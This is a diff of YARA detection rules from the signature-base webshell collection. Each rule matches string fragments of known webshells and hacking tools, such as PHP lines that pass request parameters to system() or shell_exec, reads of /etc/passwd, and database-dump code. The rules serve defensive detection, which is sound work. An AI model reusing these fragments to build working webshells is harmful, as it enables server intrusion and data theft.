-		$s5 = "system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o"
-		$s15 = "<title>$MyShellVersion - Access Denied</title>" fullword
-		$s16 = "}$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTT"
+		$s2 = "Powered By "
+		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Lolipop
+rule SIGNATURE_BASE_Rdrbs084
 {
 	meta:
-		description = "PHP Webshells Github Archive - file lolipop.php"
+		description = "Webshells Auto-generated - file rdrbs084.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "97548273-6894-5c9f-8cca-d966ce770ada"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6620-L6633"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7783-L7795"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "86f23baabb90c93465e6851e40104ded5a5164cb"
-		logic_hash = "8b0dcf76a244f80d4bee0c62189df55c1f8d71cf0900cd8ebb5916f5fe972bed"
+		hash = "ed30327b255816bdd7590bf891aa0020"
+		logic_hash = "8a743d62723c4a5f863f986edd4b149728680b40d6a4b9a99b093d62ccb70cf8"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s3 = "$commander = $_POST['commander']; " fullword
-		$s9 = "$sourcego = $_POST['sourcego']; " fullword
-		$s20 = "$result = mysql_query($loli12) or die (mysql_error()); " fullword
+		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
+		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_Cmd
+rule SIGNATURE_BASE_Hytop_Caseswitch_2005
 {
 	meta:
-		description = "PHP Webshells Github Archive - file simple_cmd.php"
+		description = "Webshells Auto-generated - file 2005.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1fd0c01a-c265-5e30-ab36-e8e93e316fbe"
+		id = "0f2b8e71-1c11-5efe-bee7-146168aec369"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6634-L6648"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7796-L7814"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "466a8caf03cdebe07aa16ad490e54744f82e32c2"
-		logic_hash = "82a65f4bbdcd2fc626aa9f36fe530d19aa19a48389e970c26e525597818914ee"
+		hash = "8bf667ee9e21366bc0bd3491cb614f41"
+		logic_hash = "0ecf28b5abb918cd1d8f38b76019dddf19dff5dbb114f16ef6ec9b46cb590a46"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<input type=TEXT name=\"-cmd\" size=64 value=\"<?=$cmd?>\" " fullword
-		$s2 = "<title>G-Security Webshell</title>" fullword
-		$s4 = "<? if($cmd != \"\") print Shell_Exec($cmd);?>" fullword
-		$s6 = "<? $cmd = $_REQUEST[\"-cmd\"];?>" fullword
+		$s1 = "MSComDlg.CommonDialog"
+		$s2 = "CommonDialog1"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s5 = "EVENT_SINK_AddRef"
+		$s6 = "By Marcos"
+		$s7 = "EVENT_SINK_QueryInterface"
+		$s8 = "MethCallEngine"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Go_Shell
+rule SIGNATURE_BASE_Ebayid_Index3
 {
 	meta:
-		description = "PHP Webshells Github Archive - file go-shell.php"
+		description = "Webshells Auto-generated - file index3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "63eaf530-050a-5db7-8885-d4a1e86d62de"
+		id = "4fc30150-7b44-53c4-888c-faf651495407"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6649-L6664"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7815-L7826"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3dd85981bec33de42c04c53d081c230b5fc0e94f"
-		logic_hash = "f2fcefb9a0536c80fa74ceb002e113f95de53d1f56e22c81b542c395dd11071d"
+		hash = "0412b1e37f41ea0d002e4ed11608905f"
+		logic_hash = "47660cb71d6787683e51aa14fc0f4a9d6f1c59517b77bfe4135098a0020ded11"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "#change this password; for power security - delete this file =)" fullword
-		$s2 = "if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};" fullword
-		$s11 = "open(FILEHANDLE, \"cd $param{dir}&&$param{cmd}|\");" fullword
-		$s12 = "print << \"[kalabanga]\";" fullword
-		$s13 = "<title>GO.cgi</title>" fullword
+		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0_2
+rule SIGNATURE_BASE_FSO_S_Phvayv
 {
 	meta:
-		description = "PHP Webshells Github Archive - file aZRaiLPhp v1.0.php"
+		description = "Webshells Auto-generated - file phvayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "10546549-e16d-567d-9d88-3d37fe8ff03f"
+		id = "07e027a6-01a5-5250-a35e-fbfef1449cfe"
 		date = "2025-03-29"
 		modified = "2025-03-29"
-		old_rule_name = "WebShell_aZRaiLPhp_v1_0"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6665-L6680"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7827-L7838"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a2c609d1a8c8ba3d706d1d70bef69e63f239782b"
-		logic_hash = "8309338bb327cc14ae5970bd921b3dba68353d55be31b9dbbc5374ded24ed563"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+		logic_hash = "d0482607f7d9cf6c89963cb9b1f943fa0b80636e857e0fb044cd9a0b3f974deb"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$RED"
-		$s4 = "$fileperm=base_convert($_POST['fileperm'],8,10);" fullword
-		$s19 = "touch (\"$path/$dismi\") or die(\"Dosya Olu" fullword
-		$s20 = "echo \"<div align=left><a href='./$this_file?dir=$path/$file'>G" fullword
+		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_Zehir4
+rule SIGNATURE_BASE_Byshell063_Ntboot
 {
 	meta:
-		description = "Webshells Github Archive - file zehir4"
+		description = "Webshells Auto-generated - file ntboot.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "7d1f39f6-04f1-51ee-b125-c35af8ae4c0c"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6681-L6694"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7839-L7853"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "788928ae87551f286d189e163e55410acbb90a64"
-		logic_hash = "36b6940ffecd9be190cce62252ec7d87f1c0bc0d19b4442df63f4404eb316364"
-		score = 55
+		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
+		logic_hash = "2fdc930eacb87d02ebe69a2b64df4103bd0f3417a76f1b2922b3d4cd4c0dffe9"
+		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "frames.byZehir.document.execCommand(command, false, option);" fullword
-		$s8 = "response.Write \"<title>ZehirIV --> Powered By Zehir &lt;zehirhacker@hotmail.com"
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "Dumping Description to Registry..."
+		$s3 = "Opening Service .... Failure !"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Zehir4_Asp_Php
+rule SIGNATURE_BASE_FSO_S_Casus15_2
 {
 	meta:
-		description = "PHP Webshells Github Archive - file zehir4.asp.php.txt"
+		description = "Webshells Auto-generated - file casus15.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a849bc6-fff5-5bb6-aff7-660889fd077b"
+		id = "d3f67fe9-a93f-504a-8b14-a815135d562f"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6695-L6708"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1d9b78b5b14b821139541cc0deb4cbbd994ce157"
-		logic_hash = "dfaf685ac3b364143bfbe289b05f066b09f01622fec3e9157f4b4791f7567619"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7854-L7865"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+		logic_hash = "45820e0398cca8e75fc4acf6863d962a817afd95a4592acd4ac4a50029684220"
 		score = 75
-		quality = 60
+		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s4 = "response.Write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&"
-		$s11 = "frames.byZehir.document.execCommand("
-		$s15 = "frames.byZehir.document.execCommand(co"
+		$s0 = "copy ( $dosya_gonder"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Php_Webshells_Lostdc
+rule SIGNATURE_BASE_Installer
 {
 	meta:
-		description = "PHP Webshells Github Archive - file lostDC.php"
+		description = "Webshells Auto-generated - file installer.cmd"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "681d8284-55e5-5316-a0d2-f4f13218df76"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6709-L6724"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7866-L7878"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"
-		logic_hash = "e3cd28f4a72f5a8a92c728fe76a7159c28256e87daf4c1dd10190a57263f5b45"
+		hash = "a507919ae701cf7e42fa441d3ad95f8f"
+		logic_hash = "73c1032313155ceb752fe2f94c8d242833127fe0443d7e3044fa1de2b2b7742b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword
-		$s4 = "header ( \"Content-Description: Download manager\" );" fullword
-		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"
-		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword
-		$s12 = "$ret = shellexec($command);" fullword
+		$s0 = "Restore Old Vanquish"
+		$s4 = "ReInstall Vanquish"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Casus_1_5
+rule SIGNATURE_BASE_FSO_S_Remview_2
 {
 	meta:
-		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
+		description = "Webshells Auto-generated - file remview.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf89d8f8-d498-57fe-98eb-a98350db182f"
+		id = "8e0492e8-d683-5c2d-b1ce-6c8344b874af"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6725-L6738"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7879-L7891"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7eee8882ad9b940407acc0146db018c302696341"
-		logic_hash = "0dbaa39bd33047d24e5bc9716108c5581da3f54e93d90f9c550b3d84de1ebfe2"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+		logic_hash = "0a682431f7044e9a49c8dd4842a22c521e2a07d5df045b0a12449e3b3206716b"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
-		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
-		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
+		$s0 = "<xmp>$out</"
+		$s1 = ".mm(\"Eval PHP code\")."
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Ftpsearch
+rule SIGNATURE_BASE_Felikspack3___PHP_Shells_R57
 {
 	meta:
-		description = "PHP Webshells Github Archive - file ftpsearch.php"
+		description = "Webshells Auto-generated - file r57.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9db8f00a-1843-5057-b8c7-a7f7b63e0659"
+		id = "14092413-27a4-5b7d-9023-0b53b3d45a12"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6739-L6753"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7892-L7903"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6"
-		logic_hash = "6b32553be4fdf26776e3cbb8a5d4d011d88f2bd50949b65934df72b89065aeec"
+		hash = "903908b77a266b855262cdbce81c3f72"
+		logic_hash = "8d0f3b2009594d4aa413c4794dca12e3c66a19974cc6d0b47cc3f5e2572a4c57"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword
-		$s9 = "@$ftp=ftp_connect('127.0.0.1');" fullword
-		$s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword
-		$s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell__Cyber_Shell_Cybershell_Cyber_Shell__V_1_0_
+rule SIGNATURE_BASE_Hytop2006_Rar_Folder_2006X
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php"
+		description = "Webshells Auto-generated - file 2006X.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "79146f25-87b9-5216-af88-4e433bb08b90"
+		id = "bda89055-27f5-50b7-86a3-2c75a5f3eadc"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6754-L6771"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7904-L7916"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fc2cf9a25ccc5aa3d9dc287ef9600b065ba9025cfb0a1ccca1bce9120ea03ff4"
+		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
+		logic_hash = "b71cf90900c7eae4caef57564292ca497a2c6c77e3de2994ba9e4cecae7f2697"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38"
-		hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f"
-		hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076"
 
 	strings:
-		$s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</"
-		$s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh"
-		$s11 = " *   Coded by Pixcher" fullword
-		$s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword
+		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
+		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_Soldierofallah
+rule SIGNATURE_BASE_FSO_S_Phvayv_2
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php"
+		description = "Webshells Auto-generated - file phvayv.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a158d158-d48d-514c-8b7b-4b6a4a10d021"
+		id = "8bd52f9b-a232-566d-90ab-4085933cdc65"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6772-L6792"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7917-L7928"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b9e0d96c8a618a4883235e8c5c9a03a1e0b586cb4b30e0273e24c35ee5ee502"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+		logic_hash = "11418a11692412ccb309983bdadd9bda2b27b692c3282eb0386094e76c7ba1e0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82"
-		hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429"
-		hash2 = "16fa789b20409c1f2ffec74484a30d0491904064"
 
 	strings:
-		$s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword
-		$s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword
-		$s3 = "$dt = $_POST['filecontent'];" fullword
-		$s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword
-		$s6 = "print \"Sorry, none of the command functions works.\";" fullword
-		$s11 = "document.cmdform.command.value='';" fullword
-		$s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST"
+		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_7
+rule SIGNATURE_BASE_Elmaliseker
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Webshells Auto-generated - file elmaliseker.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "506373d6-31b4-5a14-b009-f2b43028a98b"
+		id = "7ecf3d5c-be91-579e-905b-5f2ad03a0e42"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6793-L6811"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7929-L7941"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9d9b6b1333f2061c357fad110b5cc508288c70aea1212aa2fcbf283a2ce4fb2c"
+		hash = "ccf48af0c8c09bbd038e610a49c9862e"
+		logic_hash = "54c0b8e74a9b10fe54901c0595600af1dfc54abd3f710fc20ca87ca92236bb49"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
-		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
-		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
-		hash3 = "715f17e286416724e90113feab914c707a26d456"
 
 	strings:
-		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
-		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
-		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
-		$s4 = "if( $action == \"dumpTable\" )" fullword
+		$s0 = "javascript:Command('Download'"
+		$s5 = "zombie_array=array("
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell__Small_Web_Shell_By_Zaco_Small_Zaco_Zacosmall
+rule SIGNATURE_BASE_Shelltools_G0T_Root_Resolve
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
+		description = "Webshells Auto-generated - file resolve.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99dbcea6-7208-5bbe-b200-9ea3074d7855"
+		id = "dcdb9952-63fc-57a7-ae17-ffe8ac4271f1"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6812-L6830"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7942-L7959"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "840c58043e39014e90e7621c1d2417d5a970c744560738abc4fea3db3cbb8d5a"
+		hash = "69bf9aa296238610a0e05f99b5540297"
+		logic_hash = "39d8ac274e94f13b5eb197be5827a95ac09df70793bd584c96b81983a565c1ce"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
-		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
-		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
-		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
 
 	strings:
-		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
-		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
-		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
-		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
+		$s0 = "3^n6B(Ed3"
+		$s1 = "^uldn'Vt(x"
+		$s2 = "\\= uPKfp"
+		$s3 = "'r.axV<ad"
+		$s4 = "p,modoi$=sr("
+		$s5 = "DiamondC8S t"
+		$s6 = "`lQ9fX<ZvJW"
 
 	condition:
-		2 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell_Generic_PHP_8
+rule SIGNATURE_BASE_FSO_S_Remexp
 {
 	meta:
-		description = "PHP Webshells Github Archive"
+		description = "Webshells Auto-generated - file RemExp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "40c6f69f-9963-5e4f-af44-041d47738519"
+		id = "48a262bf-7f48-5ed9-b043-80e9d563bf21"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6831-L6850"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7960-L7973"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "346df2686c4d43b3210b07a30845477e057602500e67baba69b50c41e8d501fa"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+		logic_hash = "b9b966a89ab097494d7af90775bf124f1310c77145be67fa57ebdacd0164e3d0"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"
-		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"
-		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"
 
 	strings:
-		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword
-		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword
-		$s3 = "/* I added this to ensure the script will run correctly..." fullword
-		$s14 = "<!--    </form>   -->" fullword
-		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword
-		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword
+		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
+		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
+		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
 
 	condition:
-		3 of them
+		all of them
 }
-rule SIGNATURE_BASE_Webshell__PH_Vayv_Phvayv_PH_Vayv_Klasvayv_Asp_Php
+rule SIGNATURE_BASE_FSO_S_Tool
 {
 	meta:
-		description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt"
+		description = "Webshells Auto-generated - file tool.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1575591b-3245-5c3d-b2a4-6def89e77032"
+		id = "ed744aa4-7a35-57d6-89bd-3286a21b50a0"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L6851-L6869"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L7974-L7985"
